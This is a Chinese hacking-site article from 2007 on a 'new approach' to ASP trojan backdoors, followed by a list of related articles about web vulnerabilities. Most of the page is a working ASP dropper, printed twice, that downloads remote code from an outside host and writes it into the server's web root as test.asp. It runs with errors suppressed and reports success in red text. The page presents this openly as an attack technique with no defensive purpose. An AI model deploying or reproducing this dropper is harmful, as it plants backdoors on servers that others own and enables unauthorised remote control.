ASP木马后门新思路
更新时间:2007年01月16日 00:00:00 作者:
<%
Function GetPage(url)
dim Retrieval
Set Retrieval = createObject("Microsoft.XMLHTTP")
With Retrieval
.Open "Get", url, False ', "", ""
.Send
GetPage = BytesToBstr(.ResponseBody)
End With
Set Retrieval = Nothing
End Function
Function BytesToBstr(body)
dim objstream
set objstream = Server.createObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = "GB2312"
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function
on error resume next
Url="http://www.heibai.org/hacker/daemon.txt"
response.write "开始取得远程代码........"
wstr = GetPage(Url)
Set fs=Server.createObject("Scripting.FileSystemObject")
Set CrFi=fs.createTextFile(server.MapPath("./")&"\test.asp")
Crfi.Writeline(wstr)
set CrFi=nothing
set fs=nothing
response.write "...<font color=red>生成test.asp文件成功</font>"
%>
Function GetPage(url)
dim Retrieval
Set Retrieval = createObject("Microsoft.XMLHTTP")
With Retrieval
.Open "Get", url, False ', "", ""
.Send
GetPage = BytesToBstr(.ResponseBody)
End With
Set Retrieval = Nothing
End Function
Function BytesToBstr(body)
dim objstream
set objstream = Server.createObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = "GB2312"
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function
on error resume next
Url="http://www.heibai.org/hacker/daemon.txt"
response.write "开始取得远程代码........"
wstr = GetPage(Url)
Set fs=Server.createObject("Scripting.FileSystemObject")
Set CrFi=fs.createTextFile(server.MapPath("./")&"\test.asp")
Crfi.Writeline(wstr)
set CrFi=nothing
set fs=nothing
response.write "...<font color=red>生成test.asp文件成功</font>"
%>
相关文章
yxbbs 是一个较小的论坛系统,也算是一个较好的小论坛. 管方网站是: http://www.yimxu.com/bbs/Default.Asp 对其研究了一下,发现存在不小安全问题.2008-05-05
验证码就是每次访问页面时随机生成的图片,内容一般是数字和字母(更BT点的有中文,呵呵),需要访问者把图中的数字字母填到表单中提交,这样就有效地防止了暴力破解。验证码也用于防止恶意灌水、广告帖等。2008-05-05
前言:这种利用类型的攻击早在06年就被安全研究人员指出,不过一直没有在国内重视。而由于我们国内大部分站点正是这种有漏洞的字符集,所以影响还是比较大,希望各大站快速修复。可以看看http://applesoup.googlepages.com/。2008-06-06
MSIE DHTML Edit跨站脚本漏洞...2007-01-01
网站程序中非SI漏洞的利用...2007-01-01
fckeditor的漏洞详细篇...2007-02-02
黑客攻击揭密--分析选定的网络攻击...2007-01-01
文件上传漏洞在惠信中的应用...2007-01-01
解密DDoS攻击——“缓存溢出”新变形...2007-01-01
PHP著名开源论坛:Discuz!跨站大全...2007-01-01
最新评论